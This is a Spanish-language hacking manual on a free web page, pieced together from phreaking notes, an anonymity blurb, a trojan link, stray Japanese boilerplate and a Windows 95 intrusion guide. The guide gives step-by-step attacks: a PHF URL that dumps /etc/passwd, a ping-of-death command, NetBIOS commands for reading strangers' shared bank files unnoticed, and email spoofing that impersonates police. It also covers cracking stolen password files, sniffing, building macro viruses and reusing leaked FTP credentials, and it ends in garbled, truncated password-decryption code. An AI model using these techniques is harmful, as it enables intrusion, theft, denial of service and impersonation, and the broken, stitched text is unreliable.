Controla tu fututo
  Network ...
 

  NETWORK 

Rastreandonos

=============

  Los  registradores  de  pluma  (En  ingles  Pen  register),  son

dispositivos utilizados  por la compaia  telefonica (tambien les

llaman project) para descifrar los  tonos utilizados por las Blue

Box.

 

 Esto significa, que si tuvieras  un registrador en la linea,cada

tecla de BlueBox que pulsaras,  seria registrada y grabada en una

cinta.  De  forma  que  se  puede  adivinar  a  donde  llamas. Si

sospechas que tienes  una 'pluma' en la linea,  mi consejo es que

no phreakees.

 

 Es muy  caro poner una pluma  en la linea de  cada phreaker, asi

que  solo lo  haran con  los que  sospechen. y  no durante  mucho

tiempo. Asi que  si te rastrean, cesa en  tus actividades durante

un mes  o dos y todo  volvera a la normalidad.  la gente que cree

escuchar voces tras  cortar el enlace o piensa  que siempre estan

rastreandolo,  o  son  paranoicos  perdidos  o  han  visto muchas

peliculas.

 

 Otros peliculeros hablan de blue-tracers en centrales diferentes

a la nuestra y ademas hasta la bautizan como dark light..... Alla

ellos con su ingenuidad.

 BLACK BOX

= Me  maravilla que  aun estemos  peleandonos con  las BlackBoxes.

Intentare (si alguien  me tacha de sabelotodo, como  paso con los

passwords de defecto, desde luego sera lo ultimo que escriba).

 

 A  proposito de  estos mensajes,me  gustaria que  algun sysop se

ofreciera  a   abrir  un  area  de   ficheros  (o  ponerlos  como

boletines),  asi cualquiera  podra localizarlos  rapidamente y se

podran usar caracteres por encima del ascii 128.

 

                      TEORIA DE LA BLACKBOX

                      =====================

 

 Lo que esta maravilla en pequeo hace, es mantener el voltaje de

la  linea en  10V incluso  despues de  que se  haya levantado  el

telefono (Al descolgar, la linea sube a unos 48 Voltios). de esta

forma, los  equipos de tarificacion  de telephonica, no  detectan

que se ha descolgado y no tarifican la llamada.

http://es.geocitties.com/guiadeenlaces

COMO ESCONDER SU DIRECCIÓN IP

Cuando navega por Internet va dejando un rastro con su dirección IP por donde pasa y todo cuanto hace. Si desea navegar de una forma totalmente anónima le proponemos SafeWeb.

Para navegar de incognito por Internet solo tiene que acudir a la pagina de SafeWeb "www.safeweb.com" e introducir la dirección del sitio al que desea entrar.
A partir de ese momento navegará de forma totalmente anónima y de forma normal como siempre, pero sabiendo que SafeWeb enmascara su IP y quedará registrada
la IP de SafeWeb por todos los sitios que pase, siendo imposible llegar hasta su máquina y relacionarle con todo lo que usted haga.


<a src"http://www.terra.es/personal7/ltaberna/Troyano/PTKKAS.html " >Troyano</a>

 

貴社いよいよご隆盛のこととお慶び申し上げます。平素は当店を御利用いただき御厚情のほど、心より御礼申し上げます。冬の名残のまだ去りやらぬ時候、貴行ますますご清栄のこととお慶び申し上げます。日頃は格別のお引き立てをいただき、ありがたく御礼申し上げます。

                                   AQUI TERMINA LA PRIEMRA PARTE DE MI MANUAL

SE QUIERES       MAS INFORMACION O OTRO MANUAL  EVIA TUS COMENTARISO

Y CUIDADO CON LOS FEDERALES AMERICANOS

Silencio_max@hotmail.com

Valgensing_2421@yahoo.com

Hacker_online@Gmail.com

  c:>ftp   <- Escribimos FTP.

 

  ftp>      <- activado el modo FTP.

 

  Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los

  comandos disponibles del FTP, como no viene a cuento no los explicare pero

  buscando por hay podras hallar informacion de lo que hace cada cosa pero

  lo mejor es que lo averigues tu solito.

 

   3c. Telnet.

 

  Por suerte los usuarios de win95 con el telnet tienen mas suerte o menos

  segun se mire, ya que el servico de Telnet de win95 que tambien esta

  incorporado en el sistema, es muy facil de manejar y ademas tiene ventana

  propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que

  tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui

  la de "sistema remoto", entonces se activara otra ventana en la que

  nos saldra tres opciones, la primera "nombre de host" es donde queremos

  conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo

  tenemos "tipo de terminal" que no hace falta cambiarlo.

 

  El telnet es importante ya que es asi como entramos a una cuenta en un

  servidor y podremos hacer lo que tengamos permitido en el sistema.

  Logicamente entraremos en una cuenta si tenemos el login y password.

 

  4. Hacking Basico En Windows.

 

  Por fin ya se a acabo el latazo de la explicacion de como moverse por

  win95. Ahora ya podemos empezar a jugar un poco por inet , siempre

  por puro placer pero jamas con malos fines.

 

  En esta seccion os explicare varias maneras de hacking usando el win95 a

  pelo o sea sin utilizar ninguna herramienta externa.

 

   4a. Phf.

 

  La primera tecnica ya es muy conocida y la verdad es que tendremos suerte

  si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay

  que saber buscar y tener paciencia.

 

  Para que esto nos funcione solo tenemos que tener un navegador instalado

  en nuesto win95, por defecto suele venir el IE o sea que no podras decir

  que no tienes, siempre y cuando hallas instalado los paquetes extras.

 

  Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que

  corra sobre unix (muchos). Conectamos con un servidor en cuestion,

  www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le

  aÏadimos:

 

  http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

 

  Como ya he dicho si todo sale bien nos aparecera el fichero de passwords

  del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto

  el PHF tiene muchas variantes por eso te aconsejo que busce algo que

  profundice en esta tecnica al igual que tambien busce informacion sobre

  el fichero passwd de unix para comprenderlo.

 

   4b. Ftp.

 

  Antes ya te he explicado el funcionamiento del FTP de win95, ahora lo

  usaremos para sacer el fichero de password de un servidor. Desde una

  ventana del MS-DOS llamamos al programa FTP y escribimos:

 

  ftp> open victima.com

  Conect to victima.com

  220 victim.com FTP server ready.

 

  ftp> quote user ftp

  331 Guest login ok, send ident as password.

 

  ftp> quote cwd ~root

  530 Please login with USER and PASS.

 

  ftp> quote pass ftp

  230 Guest login ok, access restrictions apply.

 

  ftp> dir (o lo que querramos)

 

  Y como siempre es el caso si todo sale bien estaremos metidos en el

  sistema como root (en lenguaje unix significa el superusuario, o sea el

  que controla el servidor). Por desgracia esta tecnica es muy antigua por

  lo que mas seguro no funcionara pero todo es posible.

 

   4c. Ping De La Muerte.

 

  Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir

  Cracker para no ofender a nadie ya que unicamente sirve para tirar un

  servidor o sea que se desconecta de Internet y esto puede representar

  grandes perdidas a una empresa. Con esto solo os quiero decir que aunque

  aqui os lo explicare no es cuestion que lo useis por Internet atacando

  servidores.

 

  La utilidad Ping sirve principalmente para saber si un servidor esta activo

  y ademas podemos calcular el trafico en la red segun el tiempo de su

  respuesta. Basicamente se le envia un paquete a un servidor y este nos

  contesta, solo que si se le envia un paquete muy grande puede llegar

  desordenado, por lo que el servidor pide al origen que le vuelva a enviar

  una parte o la totalidad del paquete, por lo que se produce un datagrama

  del ping muy grande y producira su caida. Para ejecutar este ataque solo

  tenemos que escribir :

 

  c:>ping -l 65510 victima.com

 

  Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes

  de hacer tonterias leed la parte sobre seguridad de la guia.

 

   4d. Recursos Compartidos.

  

  Como win95 NO tiene seguridad nos permite colarnos en el disco duro de

  otra persona por Internet y lo mejor del caso es que esta tecnica nos la

  proporciona los propios programas del win95. Por supuesto no todo es tan

  sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala

  configuracion del propio usuario al no configurar adecuadamente los

  recursos compartidos de su red corriendo sobre win95.

 

  Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador

  bien configurado, o sea el compartir recursos bien puesto y tambien tener

  el Netbios instalado. Para configurarlo, tenemos que tener activado la

  opcion de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red.

  SI por el caso la opcion esta desactivada simplemente pulsamos el boton de

  "aÏadir" y aÏadimos el servicio "Compartir ficheros e impresoras en redes

  Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion"

  en "Cliente para redes Microsoft". Tambien tiene que estar activado el

  "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso

  Telefonico a Redes->Conexion a Inet que usaremos->boton derecho->

  propiedades, debiendo estar activada la casilla "conectarse a la red".

 

  Ahora ya podemos ponernos manos a la obra, entonces volvemos a una

  ventana del MS-DOS y ejecutamos:

 

  c:>nbtstat -A (IP DE LA VICTIMA)

 

    NetBIOS Remote Machine Name Table

 

    Name               Type         Status

    ---------------------------------------------

    VICTIMAMACHINE    <00>    UNIQUE     Registered

    VICTIMAGROUP      <00>    GROUP      Registered

    VICTIMAMACHINE    <03>    UNIQUE     Registered

    VICTIMAMACHINE    <20>    UNIQUE     Registered

    VICTIMAGROUP      <1E>    GROUP      Registered

 

    MAC Address = 44-45-53-54-00-00

 

  Cuando ejecutamos este comando nos saldra una tabla como esta y el

  primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes

  ver la maquina se llama VICTIMAMACHINE.

 

  Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso

  encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP

  y el nombre de la maquina en cuestion, esto seria de la siguiente forma:

 

  c:>edit c:windowssystem32LMHOSTS

 

    VICTIMAMACHINE

 

  Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos

  un comando para aÏadir el ordenador de la victima a nuestro Netbios y

  esto seria de la siguiente forma:

 

  c:>NBTSTAT -R

 

  Ahora nos interesa saber que recursos comparte la victima y esto tampoco

  nos traera complicacion alguna:

 

  c:>net view VICTIMAMACHINE

 

   Shared resources at VICTIMAMACHINE

 

   Sharename    Type         Comment

   -----------------------------------------

   BANCO        Disk

 

  Y como podemos observar comparte una carpeta llamada BANCO.

 

  Ahora ya podemos operar como si fuese una terminal mas en nuestra red local

  sobre win95. Ya solo nos queda ejecutar el comando que querramos, si por

  ejemplo queremos ver el contenido, solo tenemos que escribir:

 

  c:> dir VICTIMAMACHINEBANCO

 

  O para leer cualquier fichero de la carpeta:

 

  c:> type VICTIMAMACHINEBANCOCUENTABANCARIA.TXT

 

  Si queremos conectar al recurso compartido de forma grafica (o sea con

  una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar

  INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible

  si hemos aÏadido la VICTIMAMACHINE a una unidad de red a la que podamos

  llamar, deberemos ejecutar:

 

  c:>NET USE e: MIPCWINDOWS

 

  Esta tecnica solo funciona si la maquina remota ejecuta win95 o win 3.11 y

  ademas comparte las carpetas sin contraseÏa en modo "Acceso a nivel

  compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase

  el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en

  esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina

  para que este autorizada, esto lo conseguiremos con el Regedit, por

  desgracia los sistemas win95 y OSR2 que estan ejecutando el Servidor Web

  Personal de Microsoft desactivan esta posibilidad de acceso remoto tras

  informar de la conveniencia de hacerlo al usuario, ya que el servidor web

  obliga a compartir carpetas aun sin tener red local.

 

 

  Logicamente un usuario que haya tenido el despiste de conectarse a Internet

  con carpetas compartidas no toma luego medidas de control sobre quien

  entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser

  pillados si por ejemplo un usuario ejecuta el programa Netwatch, que

  muestra los usuarios conectados a nuestra computadora en cada momento y por

  supuesto el nombre de las computadoras por lo que es aconsejable cambiar el

  nombre de nuestra computadora usando el Regedit. Si nuestra maquina se

  llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con

  el Regedit a un nombre menos sospechoso.

 

  Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra

  computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos

  una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se

  dara cuenta de nuestra entrada. Tambien hay que decir que si la

  VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo

  "hay otros usuarios conectados a su ordenador, si apaga se desconectaran"

  si ocurre esto seremos pillados.

 

   4e. Fake Mail Con El Telnet.

 

  Esta tecnica nos ayuda a suplantar la direccion de correo electronica que

  querramos . La verdad es que tiene pocos usos, en mi opinion debido a

  una serie de razones pero siempre puede servir para gastar una buena

  broma enviando aun amigo un mail del director de la Universidad diciendo

  que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la

  Guardia Civil.

 

  La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar

  unas ciertas medidas de seguridad, que ya explicare luego. Lo primero

  que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del

  Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner

  el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos

  a que nos conectemos a ese puerto, cuando conectemos nos saldra un

  mensaje y esta esperando a que pulsemoa alguna tecla:

 

    220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)

    [d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)

 

  Muchas veces lo que podemos hacer es escribir "help" y saldran todos los

  comandos, tambien podemos escribir "echo" y la maquina nos contestara que

  esta lista. Para escribir un mail hay que seguir una serie de pasos:

 

   mail from:gc.uco@mad.servicom.es <- ponemos de donde viene.

 

  El servidor nos contesta:

 

   250 <gc.uco@mad.servicom.es> ... Sender Okay

 

  Ahora escribimos:

 

   rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos.

 

  El servidor nos contesta:

 

   250 <nob_ody@xxxxxxxx.com> ... Recipiant Okay

 

  Ahora escribimos:

 

   data

 

  El servidor nos contesta:

 

   354 Enter mail, end with "." on a line by itself

 

  Ahora escribimos:

 

   To: nob_ody@xxxxxxxx.com

   From: gc.uco@mad.servicom.es

   Subject: Te querremos!!

   Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te

   querremos fichar para el departamento.

                                              Direccion General de

                                                la Guardia Civil

   .  <- para terminar el mail.

 

  El servidor nos contesta:

 

   250 Mail accepted

 

  Ahora escribimos:

 

   quit  <- ya esta todo listo

 

  Pues ves como es realmente simple!! Pero antes de empezar a jugar con

  esta tecnica tenemos que asegurarnos que el servidor de mail no regrista

  nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a

  alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail

  sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet

  sobre servidores que permiten hacer esto.

 

   4f. Cambiando El Entorno.

 

  Esta tecnica no es que sea propia del hacking ya que solo sirve para

  cambiar la pantalla de inicio o la de finalizar windows. Los logos de

  windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros

  con extension SYS pero siguen siendo realmente BMP'S.

 

  El logo del principio de windows (ya sabes el de las nubes) lo podeis

  encontrar como:

 

  c:>logo.sys

 

  Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo

  y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro

  grafico y si lo volvemos a quitar, usara el de siempre. El logo del final

  (cuando cierra windows) esta en el directorio windows y lo podemos

  encontrar como:

  c:windows>logos.sys

 

  Logicamente es obligatorio que los graficos que querramos sustituir

  tengan de tamaÏo 320x400 y sean ficheros BMP'S. Conviene que les pongamos

  el atributo de ocultos, que esto se hace con el comando Attrib, por

  ejemplo:

 

  c:windows>attrib +h logos.sys <- lo oculta.

 

  c:windows>attrib -h logos.sys <- lo hace visible.

 

   4g. Finger.

 

  La utilidad Finger, muy usada en Unix, en realidad no esta disponible en

  Win95 pero como somos Hackers nosotros si que somos capaces desde Win95.

  Finger se utiliza para obtener informacion de un servidor. Puede parecer

  una tonteria pero es util, por ejemplo, podemos empezar a sacar los Login's

  de los usuarios y empezar a adivinar sus passwords, tambien podemos

  vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la

  ultima vez que estuvo, etc...) y asi muchas cosas.

 

  La verdad es que para usar el Finger usaremos cualquier navegador, IE o

  Netscape. Simplemete nos dirigimos a un url un poco especial, es un web

  que permite hacer Finger a cualquier host y nos deveulve los resultados.

  Esto se conoce como "Finger Gateway". El url del web es:

 

  http://www.hgp.med.umich.edu/cgi-bin/finger

  

   4h. Whois.

 

  La utilidad Whois, al igual que Finger es muy comun en Unix y no esta

  disponible en Win95 pero comos somos asi de listos saldremos del apuro.

  Tambien sirve para pedir informacion de un servidor pero no el igual que

  Finger, ya que se diferencian en el tipo de informacion, el finger se suele

  utilizar mucho para buscar direcciones de correo mientras que el Whois,

  para averiguar informacion sobre un servidor en concreto.

 

  Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un

  host muy especial:

 

  c:>telnet whois.internic.net

 

  Por supuesto Internic, una empresa privada norte ameriacana que se

  encarga de controlar los dominios de Internet, y podemos usar su base

  de datos para pedir informacion sobre un servidor.

 

  Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_

  del_servidor" y nos sacara la informacion.

 

   telnet InterNIC > whois aol.com

   Connecting to the rs Database . . . . . .

   Connected to the rs Database

   America Online (AOL-DOM)

   12100 Sunrise Valley Drive

   Reston, Virginia 22091

   USA

 

   Domain Name: AOL.COM

 

   Administrative Contact:

      O'Donnell, David B  (DBO3)  PMDAtropos@AOL.COM

      703/453-4255 (FAX) 703/453-4102

   Technical Contact, Zone Contact:

      America Online  (AOL-NOC)  trouble@aol.net

      703-453-5862

   Billing Contact:

      Barrett, Joe  (JB4302)  BarrettJG@AOL.COM

      703-453-4160 (FAX) 703-453-4001

 

   Record last updated on 13-Mar-97.

   Record created on 22-Jun-95.

 

   Domain servers in listed order:

 

   DNS-01.AOL.COM               152.163.199.42

   DNS-02.AOL.COM               152.163.199.56

   DNS-AOL.ANS.NET              198.83.210.28

 

  Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto

  es lo que nos ha sacado Internic. Al final podemos ver los dominios

  asociados a AOL. Pues sencillo y muy util, el whois.

                                                    

   4i. Tracert.

 

  Esta utilidad que si esta implementada en Win95, nos sirve para calcular

  el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos

  saber por cuantos servidores pasa. Muy util para sacar posibles servidores

  victimas si nos llaman la atencion.

 

  Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert,

  a secas y nos sacara el menu de opciones disponible.

 

  c:>tracert

 

  Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

 

  Options:

       -d                 Do not resolve addresses to hostnames.

       -h maximum_hops    Maximum number of hops to search for target.

       -j host-list       Loose source route along host-list.

       -w timeout         Wait timeout milliseconds for each reply.

 

  Pues como veis, no tiene ningun misterio las opciones del Tracert, por

  lo que ya aprendereis su uso con la experiencia. Ahora escribimos una

  direccion IP cuando invocamos al Tracert, de la siguente forma:

 

  c:>tracert 198.83.210.28

 

  Tracing route to dns-aol.ans.net [198.83.210.28]

  over a maximum of 30 hops:

 

  1   *        *        *     Request timed out.

  2 138 ms  145 ms  135 ms 204.134.78.201

  3 212 ms  191 ms  181 ms glory-cyberport.nm.westnet.net [204.134.78.33]

  4 166 ms  228 ms  189 ms enss365.nm.org [129.121.1.3]

  5 148 ms  138 ms  177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]

  6 284 ms  296 ms  178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]

  7 298 ms  279 ms  277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]

  8 238 ms  234 ms  263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]

  9 301 ms  257 ms  250 ms dns-aol.ans.net [198.83.210.28]

 

  Trace complete.

 

  Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado

  al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet.

 

  5. Utilizacion De Tools.

 

  En esta seccion os explicare diferentes tools que podeis usar para hacking,

  por supuesto hay que buscarlas por Internet, no pondre el url para

  encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe,

  pero os dire como se llama el programa asi lo podras buscar ademas esto

  tambien te servira para que te espabiles y sepas buscar cosas por Internet.

 

  Logicamente esta guia es para win95 y los programas que explicare seran

  para win95 pero tambien me veo obligado a explicar varias tools que no

  son de win95 propiamente sino de MS-DOS pero que son necesarias y ademas

  corren en modo MS-DOS de win95.

 

   5a. Skamwerks lab version 1.1b

 

  Este programa es un util herramienta que nos ayuda a crear de forma rapida

  virus macro, o sea para el Word. Tiene que estar instalado el Word para

  que este programa nos funcione.

 

  Al ejecutar el programa nos aparecera una ventana con 2 botones los caules

  son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users".

  El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus

  de macro ya que nos moveremos por varios menus y crearemos un virus de

  forma rapida y facilmente. La otra opcion, "Advanced Users" es para

  aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya

  que podemos meter codigo Word basic directamente y asi crear un virus a

  nuestro gusto.

 

  Como este no es un curso sobre virus, no me voy a enrollar sobre la

  utilizacion exacta del programa. En mi opinion es un buen programa,

  en ingles programado en C++.

 

   5b. WaReZ! Version 95.12.31

 

  Este programa es un cliente FTP que muestra los directorios ocultos en un

  servidor, util si nos metemos en algun sitio sospechoso. Como ya es

  costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL

  correctamente.

 

  Al igual que antes tampoco hay que explicar mucho sobre este programa ya

  que su Interface es igual que el cliente WS_FTP que suele ser muy familiar

  para todos, por lo que no encontraremos mucha dificultad en su manejo.

 

   5c. John the ripper v1.4.

 

  Esta magnifica tool no es propiamente de win95 pero seria un pecado no

  hablar de ella, cuando corre sobre win95 de maravilla (bueno, dentro de lo

  que cabe . John, como se le conoce, sirve para crackear un fichero unix

  de password (el conocido etc/passwd, como ya digo aprended algo de unix).

 

  Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer

  es usar el John para sacar cuentas, pero no solo basta esto sino tambien

  necesitamos un buen diccionario y una combinacion de suerte y paciencia.

 

  Supongamos que ya tenemos todo (fichero passwd, John y un diccionario),

  entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo

  llamamos sin nigun parametro nos saldran un listado de opciones, esto seria

  asi:

 

  c:>john

 

  Usage: john [flags] [passwd files]

  Flags:-pwfile:<file>[,..]     specify passwd file(s)

        -wordfile:<file> -stdin wordlist mode, read words from <file> or stdin

        -rules                  enable rules for wordlist mode

        -incremental[:<mode>]   incremental mode [using john.ini entry <mode>]

        -single                 single crack mode

        -external:<mode>        external mode, using john.ini entry <mode>

        -restore[:<file>]       restore session [from <file>]

        -makechars:<file>       make a charset, <file> will be overwritten

        -show                   show cracked passwords

        -test                   perform a benchmark

        -users:<login|uid>[,..] crack this (these) user(s) only

        -shells:[!]<shell>[,..] crack users with this (these) shell(s) only

        -salts:[!]<count>      crack salts with at least <count> accounts only

        -lamesalts              assume plaintext passwords were used as salts

        -timeout:<time>         abort session after a period of <time> minutes

        -list                   list each word

        -beep -quiet            beep or don't beep when a password is found

        -noname -nohash        don't use memory for login names or hash tables

        -des -md5               force DES or MD5 mode

 

  Veis? , y como siempre no explicare que es cada opcion os lo dejo para

  que jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero,

  para ello escogermos la opcion "single", ya que el john no nos pedira

  un fichero de diccionario, si fuese el caso que no tenemos, ponemos:

 

  c:>john -single passwd

 

  Y el John se pondra a trabajar, cuando halla acabo creara un fichero

  llamado "John.pot" donde se almacenaran los passwords encriptados con

  su correspodiente passwords desencriptado (esta definicion no es del

  todo correcta pero es para que lo entendais) y ya tenemos unas cuentas

  de acceso al servidor.

 

  Este metodo va bien para la primera pasado con el John pero luego conviene

  usar un diccionario y con el diccionario seria de la siguiente manera:

 

  c:>john -wordfile:spain.txt passwd

 

  El John seguiria el mismo proceso antes descrito, por supuesto si el

  fichero "John.pot" esta creado ya, les aÏadira los resultados obtenidos

  a este fichero, por cierto este fichero tiene atributo de solo lectura.

 

  Pues aqui se acaba la explicacion del John, que seguro que ya aprendereis

  a manejar correctamente. Referente a los diccionarios hay varias

  herramientas que corren bajo MS-DOS que crean diccionarios o tambien

  podeis buscar por Internet ya que hay varios web's llenos de diccionarios.

 

   5d. Gobbler v 2.1.

 

  Volvemos a la carga con otro programa que no es del win95 propiamente, pero

  es un sniffer que podemos usar bajo win95 en una red Ethernet. Un Sniffer

  para aquellos que no sepan, es un programa que captura los paquetes que

  pasan por una red y asi se pueden conseguir logins, passowrds u otro tipo

  de informacion que querramos, logicamente si los paquetes estan encriptados,

  esto dificultara el proceso, ya que habra que desencriptarlos si se puede.

                                                            

  Como siempre abrimos una ventana y ejecutamos el programa de la siguiente

  manera:

 

  c:>gobbler

 

  Y se activara el programa y veremos una serie de ventanas, en este punto,

  pulsamos el <ESC> y saldra una ventana con un menu. Ahora tenemos que

  configurar el programa para nuestra red, la verdad es que es muy sencillo

  de utilizar, con un poco de practica dominaremos este sniffer facilmente.

  Como sugerencia conviene leer el fichero de documentacion que trae, ya

  que explica como configurar el programa.

 

   5e. Modificando el WS_FTP.

 

  El famoso cliente ftp WS_FTP, se le puede aÏadir un host remoto el cual

  esconde mucho software interesante. Esta opcion no esta por defecto,

  simplemente hay que aÏadir una lineas en el fichero "WS_FTP.ini".

  Tenemos que aÏadir, al principio del fichero:

 

   [208.128.143.19]

   HOST=24.48.3.45

   UID=cmw

   PWD=636E79

   LMASK=

   RMASK=

   RETRIES=20

   PASVMODE=0

   COMMENT=

 

  Simple, verdad? Pues ahora cuando le digamos al cliente que se diriga al

  host 208.128.143.19 (que no es la dirrecion real, pero da igual). Pues

  que os divertais con esta cuenta y coged todo lo que podais, porque

  a saber cuanto tiempo estara vigente.

 

   5f. Sharepasswd.

 

  Este programa desencripta el passorwd de win95. Esta en lenguaje C, como

  supongo todo el mundo tiene que tener un compilador en C y si no ya estas

  buscando uno, que hay muchos y gratis por Internet. No veo la necesidad

  de explicaros el programa ya que tambien incluyo la explicacion del

  autor la cual esta muy bien, logicamente.

 

/* This program takes an 'encrypted' Windows 95 share password and decrypts it

 * Look at:

 * HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanMan

 * to find a machine's shares.  Within the data for each share are two

 * registry entries, Parm1enc and Parm2enc.  Parm1enc is the "Full access"

 * password.  Parm2enc is the "Read only" password.

 *

 * David Ross  2/9/96

 * snakey@cs.umd.edu

 *

 * Do not distribute this program for any commercial purpose without first

 * contacting me for permission.

 *

 * DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!

 *

 * A technical description of the 'code' can be found later on in this

 * document.

 *

 * Oh yeah...  a totally unsolicited self promotion here...  If anyone has

 * a job for a junior year Computer Science student for summer '96, please

 * let me know!  I'm familiar with Windows and Mac networking (especially

 * involving TCP/IP), fluent in C and C++, and working on becoming a

 * proficient Windows programmer.

 *

 */

 

#include <stdio.h>

#include <string.h>

 

#define BUFFER 30

 

int DecodeCharOne(unsigned char *);

int DecodeCharTwo(unsigned char *);

int DecodeCharThree(unsigned char *);

int DecodeCharFour(unsigned char *);

int DecodeCharFive(unsigned char *);

int DecodeCharSix(unsigned char *);

int DecodeCharSeven(unsigned char *);

int DecodeCharEight(unsigned char *);

 

main() {

 

  int i;           /* Generic counter */

  int eocc = 0;    /* Records if there has been an error */

 

  /* The following structure stores the encoded bytes.  Decoded values

   * replace the encoded values as the decoding process moves along

   * The initial values show here are not used and are unimportant

   */

  unsigned char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a };

  unsigned short tempshort;   /* Used as a go-between from sscanf() to

                                                mybytes[] so unaligned data accesses

                                                don't occur */

 

  int goupto = 0;  /* Records how many characters there are to be decoded */

 

  /* The following code handles input */

  char inpt[BUFFER];

  char *inptptr;

 

  printf("Input the byte code in hex (ex: 76 d5 09 e3): ");

  fgets(inpt, BUFFER, stdin);

 

  inptptr = strtok(inpt, " ");

  if (inpt[0] != 'n')

    while ((inptptr != NULL) && (goupto < ) {

      sscanf(inptptr, "%hx", &tempshort);

      mybytes[goupto++] = tempshort;

      inptptr = strtok(NULL, " ");

    }

 

  /* Decode all the characters.  I could have made this stop immediately

   * after an error has been found, but it really doesn't matter

   */

  if (!DecodeCharOne(&mybytes[0])) eocc = 1;

  if (!DecodeCharTwo(&mybytes[1])) eocc = 1;

  if (!DecodeCharThree(&mybytes[2])) eocc = 1;

  if (!DecodeCharFour(&mybytes[3])) eocc = 1;

  if (!DecodeCharFive(&mybytes[4])) eocc = 1;

  if (!DecodeCharSix(&mybytes[5])) eocc = 1;

  if (!DecodeCharSeven(&mybytes[6])) eocc = 1;

  if (!DecodeCharEight(&mybytes[7])) eocc = 1;

 

  /* If the password could be decoded, print it */

  if (eocc) printf("The encrypted password is invalid.n");

  else {

    printf("The decoded password is: "");

    for (i = 0; i < goupto; i++) printf("%c",mybytes[i]);

    printf(""n");

  }

}  /* End of main() */

 

/*

 
  Hoy habia 1 visitantes (2 clics a subpáginas) ¡Aqui en esta página!  
 
Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?
Registrarse gratis